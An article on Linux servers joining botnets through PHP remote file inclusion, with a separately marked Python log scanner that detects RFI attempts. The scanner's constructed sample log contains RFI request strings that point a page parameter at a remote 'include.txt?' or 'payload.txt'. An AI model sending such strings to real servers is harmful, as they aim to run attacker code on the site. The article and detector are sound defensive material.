February 14, 2007
This article was contributed by Jake Edge.
Collections of subverted machines, called
botnets, are typically
associated with Windows: thousands of zombie desktops sending spam and
causing other internet mayhem. Unfortunately, it is increasingly clear
that Linux boxes (as well as MacOS X and other UNIX boxes) are
participating in botnets, but in a bit of a twist, it is mostly servers
that have been subverted. Botnets are an enormous problem that
Vint Cerf recently
estimated
may involve up to one quarter of all internet connected computers. This
translates to a botnet controller's fondest wish: 150 million zombie machines
to rent to the highest bidder.
Desktops are usually infected with a bot by an email-borne virus or a
trojan attached to some application that the user installs, much like
adware and spyware infect machines. The bot software then connects to a
'command and control' (C&C) infrastructure, which often uses Internet Relay
Chat (IRC) servers, to get instructions on what it should do. The 'owner'
of a botnet (known as a bot herder) can then instruct the bots to do whatever
they, or more likely their client, want. Because the traffic
generated from a botnet comes from all over the Internet, it is difficult
or impossible to recognize it for what it is. This allows botnets to be
used for spamming, distributed denial of service (DDOS) attacks, click fraud and
other malicious activities in a largely untraceable way.
The desktop infection methods are not typically as useful for Linux boxes
and so bot herders have turned to web application exploits as a means
for collecting subverted machines. Attacking servers has the additional
advantage that they are usually machines with much greater resources:
faster network connectivity, more storage, faster processors, etc. The attacks
are largely targeted at everyone's favorite Internet security whipping
boy, PHP applications. Open source PHP applications are the
main target as they are ubiquitous and typically easy to exploit as
some recent
research
indicates. An additional benefit of targeting a higher level application
is that it is a cross-platform exploit; the operating system and web server
software are immaterial if the target is a PHP application.
The easiest type of vulnerability to exploit is often
Remote File
Inclusion (RFI), which allows an attacker to run code on a
vulnerable server with the permissions of the web server. Generally,
those permissions are sufficient to allow the bot to do anything the herder
might wish it to; sending email and other network traffic is not normally a privileged
activity. Even a cursory glance at the Bugtraq mailing list will reveal
numerous RFI vulnerabilities; they are reported regularly and each can lead
to bot exploitation if not patched.
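As an added illustration for administrators (example code written for this article, not part of the original and not from any project it mentions), the following Python script shows one way to spot RFI attempts in a web server's access log: an RFI attack has to pass a full remote URL in a query parameter, so flagging requests where a parameter value starts with http://, https:// or ftp:// surfaces them. The log lines, IP addresses, file names and the allowlist of parameters that legitimately carry URLs are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Feb/2007:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Feb/2007:10:01:07 +0000] "GET /index.php?page=http://198.51.100.7/include.txt? HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
198.51.100.22 - - [14/Feb/2007:10:02:14 +0000] "GET /gallery/view.php?img=ftp://198.51.100.7/payload.txt HTTP/1.0" 200 88 "-" "Mozilla/4.0"
203.0.113.11 - - [14/Feb/2007:10:03:01 +0000] "GET /docs/?ref=https://www.example.org/external HTTP/1.1" 200 732 "-" "Mozilla/5.0"
203.0.113.12 - - [14/Feb/2007:10:03:40 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" log format; the referer/user-agent pair is optional so
# "common" format lines parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Parameter values beginning with a remote scheme are what an RFI attempt
# needs to hand the include() call.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)

# Hypothetical allowlist of parameters that are expected to carry full URLs
# on this particular site; tune it per application.
URL_PARAMS_ALLOWED = frozenset({"ref"})


def parse_line(line):
    """Return the fields of one access log line as a dict, or None if unparsable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(target, allowed=URL_PARAMS_ALLOWED):
    """Return (param, value) pairs whose value is a remote URL and whose
    parameter is not on the allowlist."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in allowed:
            continue
        if REMOTE_SCHEME_RE.match(value):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Scan log text and return one finding per request that carries an
    RFI indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_indicators(rec["target"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "timestamp": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "params": hits,
                "status": rec["status"],
                "user_agent": rec["ua"],
            })
    return findings


def count_by_source(findings):
    """Aggregate findings by client IP, useful for deciding what to block."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} {f['path']} -> {f['params']} "
              f"(status {f['status']}, UA {f['user_agent']})")
    print("by source:", count_by_source(scan_log(SAMPLE_LOG)))
```

A 200 response to a flagged request is worth a closer look: the include may have succeeded and the server should be examined for dropped files, while a 404 or 500 usually means the probe missed. Parameters on the allowlist (here the constructed `ref`) are skipped so that legitimate link-tracking does not drown the report.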
Many different types of malware can be installed on a vulnerable machine,
depending on the intent of the herder. As with the exploit itself, the
installed code tends to be written in a scripting language so that it is
cross-platform. The malware can range from simple test tools
that indicate vulnerable servers to sophisticated shells that allow the
attacker to effectively login to the server and perform any allowed operation.
The most serious damage that these botnets have caused is to our
inbox; bots seem to be the preferred way to deliver spam these days.
Diligent anti-spam efforts tend to get spamming accounts or systems shut
down within hours, but there is no easy way to shut down a spam-delivering botnet. A less
visible, but potentially more damaging, effect is DDOS
attacks
on internet sites. By attacking a site and working their way up the
chain of DNS servers and registrars, a botnet can silence a site the herder
does not like or hold sites hostage until they pay a ransom.
Past efforts to thwart botnets have often focused on destroying the C&C
servers by shutting down the affected IRC sites, but botnets are
moving toward using HTTP for C&C, which allows that traffic to hide amongst
the sea of similar traffic; it also has the advantage of getting through
most firewalls. Botnets will be a serious problem going forward, and Linux
systems are not immune to participation in them. The
financial incentive is large and the means of prevention are weak, at least
so far. As we have learned by trying to deal with spam, money makes our
adversaries much more inventive which makes long-term solutions hard to
come by.